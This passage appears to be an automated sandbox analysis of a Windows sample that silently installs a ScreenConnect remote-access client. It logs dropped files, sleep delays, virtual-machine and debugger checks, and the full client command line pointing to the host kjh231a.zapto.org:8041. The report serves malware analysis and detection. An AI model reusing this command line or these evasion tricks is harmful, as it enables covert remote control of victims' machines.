                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 2A172090000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 2A173860000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 14E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1AEB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 2A70000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 2CA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 2BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: DD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 17D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 37D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: A20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1A410000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1240000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1AD90000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 6631
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Window / User API: threadDelayed 2968
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe TID: 5784 Thread sleep time: -40000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 1984 Thread sleep time: -28592453314249787s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 4796 Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 3572 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 7136 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 6200 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe Last function: Thread delayed
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe Code function: 0_2_00AC4A4B FindFirstFileExA,0_2_00AC4A4B
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe Thread delayed: delay time: 40000
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe File opened: C:\Users\user\AppData\Local\Apps\
                  Source: Amcache.hve.5.dr Binary or memory string: VMware
                  Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2920865810.000002A17405B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3287387704.00000246CF854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285134135.000002487ACDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284726965.000002487AC2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: svchost.exe, 00000006.00000002.3285369164.00000246CA02B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW P
                  Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.3285367040.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr{
                  Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
                  Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 00000007.00000002.3285828510.000002487BC56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTVMWare
                  Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
                  Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC191F
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00AC1000
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC3677 mov eax, dword ptr fs:[00000030h]0_2_00AC3677
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC6893 GetProcessHeap,0_2_00AC6893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AC1493
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC191F
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC4573
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1AAC SetUnhandledExceptionFilter,0_2_00AC1AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\np1y8xrr.mxl\jz9qewok.6wb\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\np1y8xrr.mxl\jz9qewok.6wb\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\screenconnect.clientservice.exe" "?e=support&y=guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=bgiaaackaabsu0exaagaaaeaaqafijkysshwaimlqcrmzzktgqckyg3tggm6yptlawntnx6q1gr57jh4prlfclmtmwpp16%2ftpuu72mjphrp9fe%2fdaoli7ixssenqho0ck7gf8605xw1%2b29yyv7gp%2f%2brvns8expyfnuusfya%2bcoxawqbojm2gi1vxfl4xcmggjmyswsgo9qu%2fbqw3jx3lrgsrskhqdujyq8znuvx1zvvvtewo8gfra7z6wec1ponkhykqz7ux8any9icatkjcx7fntu1t7grag6entt4wetupk2ulu2hyzl%2fvkjjkmkp1xxy2lhspvloy810giamzeqqelr11nnj7o%2bcri%2b4xi9%2bianxb&r=&i=untitled%20session" "1"
